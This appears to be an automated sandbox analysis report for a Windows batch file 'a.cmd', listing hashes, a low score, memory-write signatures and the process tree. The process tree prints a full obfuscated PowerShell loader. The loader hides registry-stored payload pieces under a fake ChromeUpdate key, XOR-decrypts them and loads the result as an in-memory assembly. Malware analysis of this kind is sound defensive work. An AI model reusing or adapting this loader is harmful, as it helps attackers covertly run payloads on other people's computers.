Analysis
max time kernel
15s
max time network
16s
platform
windows7_x64
resource
win7-20240729-en
resource tags
arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted
27-01-2025 23:02
Static task
static1
Behavioral task
behavioral1
Sample
a.cmd
Resource
win7-20240729-en
windows7-x64
1 signatures
150 seconds
General
Target
a.cmd
Size
4.2MB
MD5
8e53db2a2b188768e4c23344be407467
SHA1
99dd0a15c342904542a6f2f0b9eed3a8c68aff68
SHA256
bfcdaed93c4c3605be7e800daac4299c4aa0df0218798cb64c2e2f01027989b2
SHA512
d7533b52cd188b2f62ea35c0c7774fb5e5d1c824ac96221d8d32a8a73a4f4e29f73ef5cfb968e76def16c2c32f4a35ea6422e3945b9b2d6eb21809ec18a389b6
SSDEEP
49152:bXMw/hbcpR1DHQJLN+Z/8AEUCm5feXp8dv6Hkn1uX+OiqK67KFly6TteW5SEVAAl:G
Score
1/10
Malware Config
Signatures
Suspicious use of WriteProcessMemory (3 IoCs)
description | pid | Process | procid_target
PID 1712 wrote to memory of 2700 | 1712 | cmd.exe | 30
PID 1712 wrote to memory of 2700 | 1712 | cmd.exe | 30
PID 1712 wrote to memory of 2700 | 1712 | cmd.exe | 30
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID: 1712
C:\Windows\system32\conhost.execonhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 3626) - 
3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 1703) + 9351 
+ 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 
7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"2⤵PID:2700